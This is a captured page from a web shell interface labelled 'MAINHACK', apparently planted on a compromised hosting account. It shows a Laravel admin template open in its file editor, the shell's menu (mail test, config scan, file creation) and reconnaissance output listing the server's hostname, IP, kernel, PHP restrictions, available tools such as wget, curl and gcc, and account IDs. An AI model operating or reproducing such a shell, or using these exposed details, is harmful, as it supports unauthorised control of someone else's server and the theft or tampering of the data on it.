[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: ed1cf289a4ffa5f6919569ab91b54e6a830e1964.php
<div class="tab-pane mt-3 fade" id="images" role="tabpanel" aria-labelledby="images-tab"> <div class="row"> <div class="col-12 col-md-6"> <form action="<?php echo e(getAdminPanelUrl()); ?>/users/<?php echo e($user->id .'/updateImage'); ?>" method="Post"> <?php echo e(csrf_field()); ?> <div class="form-group mt-15"> <label class="input-label"><?php echo e(trans('admin/main.avatar')); ?></label> <div class="input-group"> <div class="input-group-prepend"> <button type="button" class="input-group-text admin-file-manager" data-input="avatar" data-preview="holder"> <i class="fa fa-chevron-up"></i> </button> </div> <input type="text" name="avatar" id="avatar" value="<?php echo e(!empty($user->avatar) ? $user->getAvatar() : old('image_cover')); ?>" class="form-control"/> <div class="input-group-append"> <button type="button" class="input-group-text admin-file-view" data-input="avatar"> <i class="fa fa-eye"></i> </button> </div> </div> </div> <div class="form-group mt-15"> <label class="input-label"><?php echo e(trans('admin/main.cover_image')); ?></label> <div class="input-group"> <div class="input-group-prepend"> <button type="button" class="input-group-text admin-file-manager" data-input="cover_img" data-preview="holder"> <i class="fa fa-chevron-up"></i> </button> </div> <input type="text" name="cover_img" id="cover_img" value="<?php echo e(!empty($user->cover_img) ? $user->cover_img : old('image_cover')); ?>" class="form-control"/> <div class="input-group-append"> <button type="button" class="input-group-text admin-file-view" data-input="cover_img"> <i class="fa fa-eye"></i> </button> </div> </div> </div> <div class=" mt-4"> <button class="btn btn-primary"><?php echo e(trans('admin/main.submit')); ?></button> </div> </form> </div> </div> </div> <?php /**PATH /home/aoneqssk/public_html/resources/views/admin/users/editTabs/images.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285